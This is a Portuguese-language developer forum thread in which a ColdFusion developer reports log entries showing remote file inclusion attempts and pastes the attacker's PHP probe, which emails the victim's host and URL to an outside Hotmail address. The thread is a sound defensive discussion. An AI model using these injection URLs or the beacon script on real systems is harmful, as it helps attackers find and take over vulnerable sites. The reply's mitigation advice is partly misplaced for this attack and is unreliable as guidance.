Tentativa de acesso indevido ao sistema

[João Ximenes]

Ola CFers!

Verificando o log de uma aplicação Coldfusion, veriquei as seguintes tentativa de acesso:

http://www.minhaaplicacao.com.br/index.cfm?i=http://www.hogarycasa.com/articulos/images/InBoX.txt?

http://www.minhaaplicacao.com.br/index.cfm?i=www.inforhoutwer.xpg.com.br/Skyweek/InboxSkYwEeK.txt

Que levariam a um arquivo com esse conteúdo:

<?php
//=================================

//
//    scan inb0x hotmail v1.0
//
//  coded by RhOuTweR
//      se vc pego essa porra não sei como mais pense "não explane"
//
//
//      linuXploit_crew 2007
//=================================

//
 ini_set("max_execution_time",-1);
 set_time_limit(0);
 $user = @get_current_user();
 $email = "$user";
 $assunto = "By_SkYwEeK";
 $email1 = "
tiag...@hotmail.com";
 $headers  = "From: <ent...@google.com>\r\n";


 if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){

 echo "Opa, enviado!";
 exit();
 }
 else{
 echo "N&#227;o enviei..";
 exit();
 }
?>

Alguém ja sofreu esse tipo de tentativa de acesso, ou tenha noção do que possa ser? Procurei no Google e não tive mts resultados, percebi apenas que parece ser uma rotina "hacker", mas ñ consegui entender sua função.

Desde já agradeço a atenção de todos e fica o registro pra se ter cuidado.

Abçs.


--
João Ximenes
Desenvolvedor Web

[Mario Kojima]

João,

Me parece que é um "robozinho" que  está tentando usar o seu site para enviar email.

Tenho verificado tentativas desse tipo em alguns dos projetos que estou envolvido.
Por isso é importante ficar atento a esse tipo de verificação de segurança, utilizando sempre <CFQUERYPARAM..> e métodos de verificação tipo "captcha".

[]s

--
Mário Kojima Jr.